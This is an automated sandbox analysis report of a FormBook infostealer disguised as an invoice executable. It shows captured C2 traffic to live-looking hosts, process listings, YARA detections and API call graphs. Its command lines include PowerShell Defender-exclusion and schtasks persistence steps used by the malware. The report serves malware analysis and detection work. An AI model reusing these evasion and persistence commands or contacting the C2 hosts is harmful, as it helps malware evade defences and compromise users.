                                                                                                                              Oct 7, 2024 12:36:31.961532116 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              date: Mon, 07 Oct 2024 10:36:31 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                                              Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                                              Data Ascii: <div class="info-heading"> www.nieuws-july202491.sbs/cp_errordocument.shtml (port 80) </div> </li> <li class="info-server"></li>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 50044 | 8.217.17.192 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:36:37.032697916 CEST | 772 | OUT | POST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=wv42pZALNojP8BYWp3szC3V0dFDzRmnxntzqjBf63Ig+Rftdif8CZ3Jy0xF11Wag8hCTqoSSzmuB7lKlIt74SpCNgVRzcsTMOfQQ1oOYMoexSGBowsam7P30bVAOW1ZmvZ5GyGBTR5cnAL3PHBfmpDWR4A80oTOwW6Z0COY5YQq9m2z7xdEnXmn3+kjc3ifdBMqhumK1PeQJ
Oct 7, 2024 12:36:37.921485901 CEST | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:37 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 50045 | 8.217.17.192 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:36:39.576016903 CEST | 796 | OUT | POST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=wv42pZALNojP9hoWqQ4zEXV3BVDzaGn1nt/qjAbq3+Y+R91djdECVXJyzBE/rmaV8hOtqtqSzmqB7g2lPeT3T5CPp1RiSMTMOfQQ1oyyMoWxRzJoxNan9/3rR1AOS1ZqvZ5eyE1pR7UnAJfPHSHlmDWXnQ8muye5esoWK/QGPH2onAyhtuEEF2H1+m7u3Cf3DMSh8xGSAq1qiMCBBt6gr6NoHP1qPZ0/SA==
Oct 7, 2024 12:36:40.465425968 CEST | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:40 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 50046 | 8.217.17.192 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:36:42.126420975 CEST | 1809 | OUT | POST /x0tl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Origin: http://www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.meliorahomes.net/x0tl/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Data Ascii: ej6Le= [TRUNCATED]
Oct 7, 2024 12:36:43.034208059 CEST | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:42 GMT
                                                                                                                              Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                                                                                              Content-Length: 203
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /x0tl/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 50047 | 8.217.17.192 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:36:44.664339066 CEST | 508 | OUT | GET /x0tl/?An=mLdxo2Y8RLRh&ej6Le=9tQWqttnWu7MjGZLyiEcCzdUDF7UN3PBgIeLryHozuROP/1ck4METjVt2AM5oXaP3hSOrK+o7VaG5j6GesXwOMuHrEAdecfGMf0B1/a+f8XsVC4h6LXHmO6QOE5KLV0/obdy6xQ= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.meliorahomes.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                                                                                              Target ID:0
                                                                                                                              Start time:06:32:58
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0xf90000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0x30000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
                                                                                                                              Imagebase:0x30000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"
                                                                                                                              Imagebase:0x200000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:06:33:04
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:06:33:05
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
                                                                                                                              Imagebase:0xc30000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:06:33:07
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Imagebase:0x600000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:06:33:08
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe"
                                                                                                                              Imagebase:0xb20000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:14
                                                                                                                              Start time:06:33:08
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff717f30000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:06:33:10
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\svchost.exe"
                                                                                                                              Imagebase:0x950000
                                                                                                                              File size:46'504 bytes
                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:17
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"
                                                                                                                              Imagebase:0x200000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:18
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:19
                                                                                                                              Start time:06:33:16
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
                                                                                                                              Imagebase:0x8d0000
                                                                                                                              File size:949'248 bytes
                                                                                                                              MD5 hash:A903C6FB836F2C2C2762D1FDE269BDB8
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:06:33:34
                                                                                                                              Start date:07/10/2024
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                              Imagebase:0x7ff728280000
                                                                                                                              File size:676'768 bytes
                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true


                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:135
                                                                                                                                Total number of Limit Nodes:10

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 016CD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 016CD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 994ce9c5975c8dcdb204d338962166efd9f3f7f5c27c23ab9c8c1737c66db0d6
                                                                                                                                • Instruction ID: d7ddc0a66b12556f503aaefa61d3866a42c282be355d21ed346123cf09799e1f
                                                                                                                                • Opcode Fuzzy Hash: 994ce9c5975c8dcdb204d338962166efd9f3f7f5c27c23ab9c8c1737c66db0d6
                                                                                                                                • Instruction Fuzzy Hash: B55155B09013498FEB54DFA9D948BAEBBF1FF88314F20846DE409AB350DB746944CB65

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 016CD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 016CD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 016CD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 87e6bb259f9956d1a24c87dfa7f451348246af21875a5da2e2628716e88ff0a1
                                                                                                                                • Instruction ID: 9cb7a5c419d00e1e26c9f6b013cb5404822740c9732342eb841210c91cd6b8dd
                                                                                                                                • Opcode Fuzzy Hash: 87e6bb259f9956d1a24c87dfa7f451348246af21875a5da2e2628716e88ff0a1
                                                                                                                                • Instruction Fuzzy Hash: E45166B09013498FEB54DFA9D948BAEBBF1FF88314F20842DE109A7350DB75A844CB65

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016CAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: af00b1324bc9f56b2e56328f9e4af662b3a643cb67f8a2770a276d07f7139e1e
                                                                                                                                • Instruction ID: 8f113dd8a02e6aa623a67a94c7ddb48626d37d2cd28a2042055889fb87aa65d0
                                                                                                                                • Opcode Fuzzy Hash: af00b1324bc9f56b2e56328f9e4af662b3a643cb67f8a2770a276d07f7139e1e
                                                                                                                                • Instruction Fuzzy Hash: C7813470A00B098FE724DF69C84476ABBF1FF88604F008A2DD546D7B40EB75E845CB94

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016C59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: c490f118b4c96cc3c6e147ed864e02d84c2a0ed56b57ac73bbe5baec2dc98c30
                                                                                                                                • Instruction ID: b75579c162aee681e27893d66a8cb9291a42dd5cfc6f55345c37ef81780629cf
                                                                                                                                • Opcode Fuzzy Hash: c490f118b4c96cc3c6e147ed864e02d84c2a0ed56b57ac73bbe5baec2dc98c30
                                                                                                                                • Instruction Fuzzy Hash: A541DEB0D0075DCBEB24CFAAC884B9EBBB5FF49704F20816AD409AB251DB756945CF90

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 016C59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2189419071.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_16c0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: e81cfdd2e02e817d9fe2c7f4e791ef6f1392c9bf88ca8f5c69f84ee121075046
